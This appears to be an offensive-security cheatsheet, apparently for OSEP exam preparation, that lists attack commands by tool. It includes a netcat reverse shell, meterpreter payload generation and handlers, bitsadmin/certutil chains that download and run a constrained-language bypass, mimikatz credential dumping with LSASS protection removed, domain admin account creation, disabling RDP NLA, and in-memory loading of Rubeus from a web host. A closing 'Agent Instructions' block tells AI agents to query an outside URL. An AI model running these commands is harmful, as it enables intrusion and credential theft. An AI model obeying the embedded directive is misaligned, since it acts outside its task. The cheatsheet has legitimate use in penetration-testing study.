# Tools ### bash ```bash # View apache logs sudo tail -f /var/log/apache2/access.log # Find vulnerable private ssh keys find /home/ -name "id_rsa" # Descargar fichero de clave ssh por scp scp linuxvictim@linuxvictim:svuser.key ./ # Buscar fichero de cache kerberos en linux sudo find / -name "*krb5cc*" # comprobar version de linux uname -m cat /etc/issue # x86_64: para sistemas de 64 bits basados en Intel o AMD. # i386 o i686: para sistemas de 32 bits basados en Intel o AMD. # armv7l: para sistemas de 32 bits basados en ARM. # aarch64: para sistemas de 64 bits basados en ARM. # Who else is on this box (lateral movement)? ls -la /home cat /etc/passwd # What executables have SUID bit that can be executed as another user? find / -type f -user root -perm /u+s -ls 2>/dev/null # Privilege escalation sudo -l cat /etc/sudoers cat /etc/sudoers.d # imprimir hora del sistema date +"%b %d %T" ``` ### bitsadmin ```bash # Tranfer bitsadmin /Transfer myJob http:///bypass-clm.txt C:\Windows\Tasks\bypass-clm.txt # Transfer, Decode and Execute bitsadmin /Transfer myJob http:///bypass-clm.txt C:\Windows\Tasks\bypass-clm.txt && certutil -decode C:\Windows\Tasks\bypass-clm.txt C:\Windows\Tasks\bypass-clm.exe && del C:\Windows\Tasks\bypass-clm.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass-clm.exe ``` ### certutil ```bash # Encode EXE to B64 certutil -encode \\\visualstudio\CLMBypass\bin\Release\CLMBypass.exe \\\visualstudio\CLMBypass\bin\Release\CLMBypass.txt certutil -encode \\\visualstudio\bypass-clm\bypass-clm\bin\x64\Release\bypass-clm.exe \\\visualstudio\bypass-clm\bypass-clm\bin\x64\Release\bypass-clm.txt # Decode B64 to EXE certutil -decode C:\Windows\Tasks\bypass-clm.txt C:\Windows\Tasks\bypass-clm.exe # intallutils ``` ### chisel ```bash # Habilitar autenticación de contraseña sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/g' /etc/ssh/sshd_config # Reiniciar servicio ssh sudo systemctl start ssh.service # sudo nano /etc/proxychains.conf socks5 127.0.0.1 1080 chisel server -p 8080 --socks5 --reverse ./chisel.exe client :8080 R:1080:socks ``` ### cmd ```bash # View privileges of actual user - SeImpersonatePrivilege is a good privilege whoami /priv # View Domain group net user ted /domain | find "Group" # Create a domain admin user with RDP net user /add /domain net localgroup "Remote Desktop Users" /add /domain net group "domain admins" /add /domain # CLM Bypass C:\Windows\Tasks\bypass-clm.exe # InstallUtil # To find InstallUtil Path dir \Windows\Microsoft.NET\* /s/b | findstr InstallUtil.exe$ # Execute InstallUtils C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\CustomRunspace.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\CLMBypass.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass-clm.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\SpoolSample.exe dc03. web05. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\chisel.exe # Deshabilitar NLA (Autenticación a nivel de red) para conectar por RDP sin problemas reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f # Ver GPO politicas que aplican (o no) a mi equipo gpresult /r /Scope Computer # obtener información sobre las GPO que se aplican a tu equipo reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f sc create mimidrv binPath= C:\Windows\Tasks\vmimidrv.sys type= kernel start= demand sc start mimidrv ``` ### crackmapexec ```bash # Check if samba is enable and extrack netbios name crackmapexec smb # -u -p '' # Check if samba is enable and extrack netbios name all subnet crackmapexec smb 172.16.218.0/24 ``` ### dotnettojscript ```bash DotNetToJScript.exe \\\visualstudio\DotNetToJScript\ExampleAssembly\bin\Release\ExampleAssembly.dll --lang=Jscript --ver=v4 -o shell.js ``` ### evil-winrm ```bash evil-winrm -u \\administrator -H -i ``` ### gcc ``` gcc -static shell.c -o shell.elf upx -9 shell.elf ``` ### gobuster ```bash # Common directories on root gobuster dir -u http:// -w /home//.fuzz/dirb/common_4459.txt -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -e -t 23 -o xx_root_directories.fuzz # Common files and directories on root gobuster dir -u http:// -w /home//.fuzz/dirb/common_4459.txt -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -e -t 23 -x .php,.html,.txt -o xx_root_files_directories.fuzz ``` ### hashcat ```bash # Descifrar Hash NTLM v2 hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force # Descifrar Hash Ansible hashcat -m 16900 hash.txt /usr/share/wordlists/rockyou.txt --force # kerberos hashcat hashes.txt -m 13100 -a 3 # Buscar ID https://hashcat.net/wiki/doku.php?id=example_hashes ``` ### hostrecon ```bash . .\HostRecon.ps1 Invoke-HostRecon Invoke-HostRecon | Out-File C:\Windows\Tasks\HostRecon.txt ``` ### impacket ```bash # Obtener todos los usuarios del dominio, sin pedir pass y usando autenticación kerberos GetADUsers.py -all -k -no-pass -dc-ip / GetUserSPNs.py -request -k -no-pass -dc-ip / GetNPUsers.py -k -no-pass -dc-ip / -usersfile users -format john -outputfile hashes ``` ### johntheripper ```bash # Descargar clave por ssh scp @:/home//.ssh/id_rsa ./ # Convertir clave a formato legible por johntheripper python /usr/share/john/ssh2john.py id_rsa > .hash # Fuerza bruta sudo john --wordlist=/usr/share/wordlists/rockyou.txt svuser.hash ``` ### metasploit #### meterpreter ```bash # View channels channel -l # Get Username getuid # Migrate shell to explorer process migrate -N explorer.exe migrate -N w3wp.exe migrate -N spoolsv.exe # Create a notepad obfuscate process and migrate execute -H -f notepad migrate XXXX # Search file search -f local.txt # Enum LAPS run post/windows/gather/credentials/enum_laps ``` #### msfconsole ```bash # Windows 32 bits (para Word) sudo msfconsole -q -x "use multi/handler; set payload windows/meterpreter/reverse_https; set exitfunc thread; set lhost ; set lport 443; exploit" # Windows 64 bits sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost ; set lport 443; exploit" # Linux # Atención a `MeterpreterTryToFork true` esto permite hacer algo similar a migrate en Windows, además, permite hacer uso del comando shell sudo msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost ; set lport 443; set MeterpreterTryToFork true; exploit" # Create workspace workspace -a [WORKSPACE] # Import from nmap db_import all.xml # Ver o añadir hosts hosts hosts -a [IP] ``` #### msfvenom ```bash # 32 bits (para Word) sudo msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 EXITFUNC=thread -f csharp # 64 bits sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 -f exe -o /var/www/html/shell.exe # ASPX sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 -f aspx -o /var/www/html/shell.aspx # Linux # La opcion `-k MeterpreterTryToFork=true` hace algo similar a migrate en windows, además, permite usar el comando shell sudo msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=443 -k MeterpreterTryToFork=true -f c msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 -f raw -o shell.bin ``` ### mimikatz ```bash # Obtener NTLM de administrador del dominio en Web05 C:\Windows\Tasks\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain: /user:administrator /csv" "exit" C:\Windows\Tasks\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit" C:\Windows\Tasks\mimikatz.exe "token::elevate" "lsadump::secrets" "exit" ./mimikatz.exe "lsadump::lsa /patch" "exit" ``` ### mssql Connect with windows-auth ```bash mssqlclient.py :@ -port 1433 -windows-auth ``` Connect with password ```bash mssqlclient.py @ # 8 ``` ### netcat nc ```bash # rlwrap -cAr nc -lvnp 443 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f # Compartir un fichero por netcat nc # Atacante cd /var/www/html nc -nlvp 443 < /var/www/html/chisel # Victima cat > chisel < /dev/tcp//443 chmod +x chisel # Comprobar md5sum chisel # Pasar archivo de windows a linux # linux para recibir archivo nc -lp 1234 > mimi.txt # windows para enviar nc.exe 1234 < mimi.txt # IMPORTANTE, CERRAR LA CONEXIÓN DESDE LINUX (EL RECEPTOR) ``` ### nmap ```bash # Escaneo de versión con scripts a todos los puertos, tratar a todos como online, deteccion de sistema operativo, minimo de paquetes por segundo nmap -sT -sC -sV -p- -Pn -A -vvv -T3 --min-rate=1000 -oA nmap/all -iL scope.txt # Escanear subred # Obtener información de netbios nmap -sTV -A -Pn -A -p 3389 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168 # super rápido nmap -sTV -A -Pn --top-ports 25 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168 nmap -sTV -A -Pn --top-ports 25 --min-rate=1000 -T5 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168 # esto funciona pero mete mucha caña y se puede caer la conexion # con proxychains proxychains -q nmap -sT -Pn -n --top-ports 25 -T3 --min-rate=1000 -vvv -oA nmap/subred 172.16.237.150 ``` ### ntlmrelayx ```bash ntlmrelayx.py --no-http-server -smb2support -t smb://172.16.183.152 ``` ### lapstoolkit ```bash # Import . .\LAPSToolkit.ps1 Import-Module .LAPSToolkit.ps1 # Discovers LAPS Delegated Groups Find-LAPSDelegatedGroups # Checks the rights on each computer with LAPS enabled for any groups with read access and users with `All Extended Rights` Find-AdmPwdExtendedRights # Find computers with LAPS enabled, discover password expiration and can discover randomized password Get-LAPSComputers ``` ### ldapsearch ```bash # get dump users ldapsearch -Y GSSAPI -H ldap://dmzdc01. -D "@" -W -b "dc=,dc=com" '(&(objectClass=user))' ldapsearch -Y GSSAPI -H ldap://dmzdc01. -D "@" -W -b "dc=,dc=com" "servicePrincipalName=*" servicePrincipalName ``` ### linpeas ```bash # Grabar session de terminal script -t 2> timing.log -a session.log # Despues lanzar comando y Ctrl + D para parar scp @:session.log ./ cat session.log | aha --black --title "Terminal Session USER MACHINE" > linpeas__.html rm timing.log session.log ``` ### powermad ```bash # importar # crete machine to RBCD attack New-MachineAccount -MachineAccount -Password $(ConvertTo-SecureString '' -AsPlainText -Force) -Verbose ``` ### PowerShell Add domain admin ```powershell net user /add /domain net localgroup "Remote Desktop Users" /add /domain net group "domain admins" /add /domain runas /user: "Powershell.exe /c whoami" rdesktop -a 8 -z -x l -u -p -d -g 1366x768 -r sound:off -r clipboard:CLIPBOARD -r disk:home=/home//osep ``` Add local admin with RDP ```powershell net user /add net localgroup Administrators /add net localgroup "Remote Desktop Users" /add runas /user: "Powershell.exe /c whoami" rdesktop -a 8 -z -x l -u -p -g 1366x768 -r sound:off -r clipboard:CLIPBOARD -r disk:home=/home//osep ``` Change user password ```powershell $creds = New-Object System.Management.Automation.PSCredential ("\", (ConvertTo-SecureString "" -AsPlainText -Force)) $UserPassword = ConvertTo-SecureString '' -AsPlainText -Force Set-DomainUserPassword -Identity -AccountPassword $UserPassword -Credential $creds -Verbose ``` Change user password and cover ```powershell $remote = New-Object System.Management.Automation.PSCredential ("\", (ConvertTo-SecureString "" -AsPlainText -Force)) $creds = ConvertTo-SecureString '' -AsPlainText -Force Set-DomainUserPassword -Identity -AccountPassword $creds -Credential $remote -Verbose ``` Check 64bit shell ```powershell [Environment]::Is64BitOperatingSystem ``` Check CLM ```powershell $ExecutionContext.SessionState.LanguageMode ``` Enable PSRemoting ```powershell Enable-PSRemoting -Force ``` Load Assembly ```powershell $data = (New-Object System.Net.WebClient).DownloadData('http:///Rubeus.exe') $assem = [System.Reflection.Assembly]::Load($data) [Rubeus.Program]::Main("s4u /user:$ /rc4: /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) ``` Run DLL ```powershell Rundll32 c:\windows\tasks\shell.dll,run ``` Runas ``` runas /user:\ powershell ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://awesome.hackpuntes.com/osep-cheatsheet/tools.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.